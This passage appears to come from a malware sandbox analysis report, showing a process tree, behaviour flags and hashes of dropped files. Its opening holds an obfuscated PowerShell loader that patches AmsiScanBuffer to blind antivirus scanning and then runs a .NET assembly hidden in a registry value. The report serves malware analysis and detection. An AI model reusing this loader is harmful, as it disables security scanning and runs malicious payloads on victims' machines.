$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+'dl'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+''+'3'+''+'2'+''+'.'+''+'U'+''+[Char](110)+''+'s'+''+'a'+''+'f'+'e'+'C'+''+[Char](66)+''+'F'+''+[Char](67)+''+[Char](80)+''+'A'+'w'+[Char](102)+''+[Char](106)+'Gmvy');$XGJJSJKaLNioJC=$CBFCPAwfjGmvy.GetMethod(''+[Char](88)+''+[Char](71)+'J'+'J'+'S'+'J'+'K'+[Char](97)+''+[Char](76)+''+[Char](78)+''+[Char](105)+''+[Char](111)+''+[Char](74)+''+[Char](67)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZKAYmDWLMrjBvvWclNj=sxAlHkGsEkrW @([String])([IntPtr]);$KrtYyAxqWFNeakRDbgWOvX=sxAlHkGsEkrW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rHwILIjbwEn=$CBFCPAwfjGmvy.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'eHa'+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+'l')));$paISsFDuTYBwKC=$XGJJSJKaLNioJC.Invoke($Null,@([Object]$rHwILIjbwEn,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+'Li'+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$QGwDeQGEoFzhFmHxz=$XGJJSJKaLNioJC.Invoke($Null,@([Object]$rHwILIjbwEn,[Object](''+[Char](86)+'ir'+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$lakEoMF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($paISsFDuTYBwKC,$ZKAYmDWLMrjBvvWclNj).Invoke('a'+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+'l');$BuOMfhqPoczwbiadW=$XGJJSJKaLNioJC.Invoke($Null,@([Object]$lakEoMF,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+'B'+[Char](117)+''+'f'+'fe'+[Char](114)+'')));$ndxMmqlOXG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QGwDeQGEoFzhFmHxz,$KrtYyAxqWFNeakRDbgWOvX).Invoke($BuOMfhqPoczwbiadW,[uint32]8,4,[ref]$ndxMmqlOXG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BuOMfhqPoczwbiadW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QGwDeQGEoFzhFmHxz,$KrtYyAxqWFNeakRDbgWOvX).Invoke($BuOMfhqPoczwbiadW,[uint32]8,0x20,[ref]$ndxMmqlOXG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵PID:4520
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{42f376f4-4d58-4234-a29b-ea604b4cc717}1⤵PID:1764
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.7MB
MD535dbf36cc33d84930bac9d66a141af05
SHA111e41f289355a99f812f400247632403feabd494
SHA25640ef7d8a6123e7842889f15406677fabf2534c5680f3c0df2c0087b7fe14ec63
SHA512d16cf2f1f29c6f5c838c08f055e39d2b54639ffd18b3d7dff950fc55a06c9ec495c2272456072ab014f7b81671b6ae66a89a73ccab3f78b4757f4e9129fb7fb5
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD559d97011e091004eaffb9816aa0b9abd
SHA11602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA25618f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
-
Filesize
1KB
MD5c40b803b937e1f2c38fd0759eff18b78
SHA1475f3882d731732dc873d02e6f2df33dee23ed30
SHA2564c8a3ef2f1eba0567f12d40114dcd76265fcabe4d96b3c34a5e80133938bb4f7
SHA512e0ae16727c518160608d1e79ee99bffc61b998ce1dcea8dbb3272a72ee917dd9fd64f0818578444da3bc06e11bfa2007ecd7501c3bd2776988a047a3162b32aa